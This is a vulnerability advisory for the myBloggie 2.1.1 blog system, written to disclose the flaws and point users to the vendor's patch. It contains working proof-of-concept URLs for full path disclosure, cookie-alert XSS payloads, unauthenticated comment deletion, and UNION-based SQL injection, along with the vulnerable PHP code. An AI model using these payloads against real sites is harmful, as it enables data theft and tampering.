******************************************************
* CODEBUG Labs
* Advisory #9
* Title: Multiple vulnerabilities in myBloggie 2.1.1
* Authors: Alberto Trivero & CorryL
* English Version: Alberto Trivero
* Product: myBloggie 2.1.1
* Type: Multiple Vulnerabilities
* Web: http://www.codebug.org/
******************************************************


--) Software Page (mybloggie.mywebland.com)

"myBloggie is considered one of the most simple, user-friendliest yet packed with features
Weblog system available to date. Built using PHP & mySQL, web most popular scripting
language & database system enable myBloggie to be installed in any webservers."


--) Full Path Disclosure

Thanks to an improper sanitization of the post_id parameter, it's possible to show the
full path by sending a simple request:

    http://www.example.com/mybloggie/index.php?mode=viewid&post_id='


--) Cross-Site Scripting (XSS)

Input passed to 'year' parameter in viewmode.php is not properly sanitised before being
returned to users. This can be exploited execute arbitrary HTML and script code in a
user's browser session in context of a vulnerable site with an URL like this:

    http://www.example.com/mybloggie/index.php?month_no=3&year=%3Cscript%3Ealert(document.cookies)%3C/script%3E

Frequently, when there is an SQL syntax error, MySQL, in the HTML page, report the value
of the parameter that caused the error without sanitization. So it's possible tu inject
HTML code in some parameter like these:

    http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3EC
    http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
    http://www.example.com/mybloggie/index.php?mode=viewid&post_id=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E

Note that this vulnerability it's only in part related to a iussue of the blog.


--) Arbitrary Comment Deletion

Let's look at code from delcomment.php at line 31:

    <?
    ...
    if (isset($_GET['comment_id'])) $comment_id = $_GET['comment_id'];
    if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
    
    if ($confirm=="") {
    message($lang['Confirm'], $lang['Msg_Del_error3']." <a class=\"std\" href=\"".$_SERVER['PHP_SELF']."?mode=delcom&comment_id=".$comment_id."&confirm=yes\">".$lang['Yes']."</a>");
    }
    elseif ($confirm=="yes") {
    // Data Base Connection  //
    $sql = "DELETE FROM ".COMMENT_TBL." WHERE comment_id=$comment_id";
    $result = $db->sql_query($sql);
    $confirm ="";
    message($lang['Del'], $lang['Msg_Del']);
    }
    else message( $lang['Error'],$lang['Msg_Del_error2'] );
    ?>

This piece of code has the task of delete a comment of a post. Normally this operation
can be do only by the administrator by click on a specific link that the other users
can't view. But this URL can be created by any user and myBloggie doesn't control if
the user that send the request has the privileges to do it. So anyone can delete
comments of others users specifing the comment id with this URL:

    http://www.example.com/mybloggie/index.php?mode=delcom&comment_id=[comment_id]&confirm=yes


--) SQL Injection

Let's look at code from search.php at line 62:

    <?
    ...
    $sql = "SELECT COUNT(a.post_id) AS num_posts
    FROM " . POST_TBL . " a
    WHERE a.subject like '%".$keyword."%' OR a.message like '%".$keyword."%'" ;
    ...
    ?>

When myBloggie get the value of the 'keyword' parameter and put it in the SQL query,
don't sanitise it. So a remote user can do SQL injection attacks. This is a PoC URL:

    http://www.example.com/mybloggie/index.php?mode=search&keyword=trivero%'%20UNION%20SELECT%20null/*

These are other PoC URLs for other parameters:

    http://www.example.com/mybloggie/index.php?month_no=1&year=1&mode=viewdate&date_no=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/*
    http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/*
    http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/*
    http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=1&year=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/*
    http://www.example.com/mybloggie/index.php?mode=viewid&post_id=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/*


--) Patch

After the report to developer of the blog of these bugs, he realesed the patches
available at this address: http://mywebland.com/forums/viewtopic.php?t=180


******************************************************
*        http://www.codebug.org/
******************************************************